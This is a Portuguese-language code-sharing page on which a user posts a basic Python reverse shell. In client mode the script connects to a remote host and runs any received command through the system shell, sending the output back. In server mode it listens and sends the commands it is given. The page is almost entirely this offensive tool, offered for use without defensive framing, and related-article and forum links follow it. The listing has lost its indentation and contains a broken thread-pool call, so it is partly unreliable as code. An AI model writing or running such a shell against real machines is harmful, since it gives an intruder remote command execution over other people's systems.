Shell Reverso em Python
Publicado por henrique (última atualização em 04/11/2020)
[ Hits: 4.980 ]
Homepage: naotem.com
Shell reverso básico em Python.
#!/usr/bin/env python3
import socket, os, subprocess, sys
from time import sleep
from concurrent.futures import ThreadPoolExecutor
n_threads = 10
buffer = int(4096)
try:
if sys.argv[1] == '-h':
print("""-l [ipv4]
-p [port]
-s = servidor
-c = cliente
-h = ajuda
example: ./msfconsoleh -l 192.168.0.102 -p 9999 -s""")
sys.exit()
except:
print("""-l [ipv4]
-p [port]
-s = servidor
-c = cliente
-h = ajuda
example: ./msfconsoleh -l 192.168.0.102 -p 9999 -s""")
sys.exit()
if sys.argv[1] == '-l':
host = str(sys.argv[2])
if sys.argv[3] == '-p':
port = int(sys.argv[4])
a = input('cliente ou servidor: ')
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def send_commands(client_socket):
print('qualquer comando depois siga')
while True:
cmd = input()
if cmd == 'exit':
client_socket.close()
s.close()
sys.exit()
if len(str.encode(cmd)) > 0:
client_socket.send(str.encode(cmd))
client_response = str(client_socket.recv(1024), "utf-8")
print(client_response, end="")
def server():
s.bind((host, port))
s.listen(5)
print(f'listando {host}:{port} ...')
client_socket, client_adress = s.accept()
print(f'{client_adress[0]}:{client_adress[1]} Connectado!')
message = 'hnx'
client_socket.send(message.encode())
send_commands(client_socket)
client_socket.close()
def client():
s.connect((host, port))
message = s.recv(buffer).decode()
print('servidor: ', message)
while True:
data = s.recv(buffer)
if data[:2].decode("utf-8") == 'cd':
os.chdir(data[3:].decode("utf-8"))
if len(data) > 0:
cmd = subprocess.Popen(data[:], shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
output_bytes = cmd.stdout.read()
output_str = str(output_bytes, "utf-8")
s.send(str.encode(output_str + str(os.getcwd()) + '#'))
s.close()
with ThreadPoolExecutor(max_workers=n_threads) as pool:
pool.map(server)
pool.map(client)
if a in 'Ss':
server()
if a in 'Cc':
client()
if s.close() or sys.exit():
print('-' * 20, 'fim', '-' * 17)
Peer-to-peer nós para processamento em multipontos
Scanner Wifi in Python [very simple and helpful]
Cirurgia para acelerar o openSUSE em HD externo via USB
Void Server como Domain Control
Modo Simples de Baixar e Usar o bash-completion
Monitorando o Preço do Bitcoin ou sua Cripto Favorita em Tempo Real com um Widget Flutuante
Opções secretas em tema do Cinnamon
Como mapear unidade de rede no Linux
Como quebrar senha usando john the ripper
Não consigo instalar distro antiga no virtualbox nem direto no hd (25)
queria saber como posso alterar a frequencia do meu ryzen 2300u pro (3)









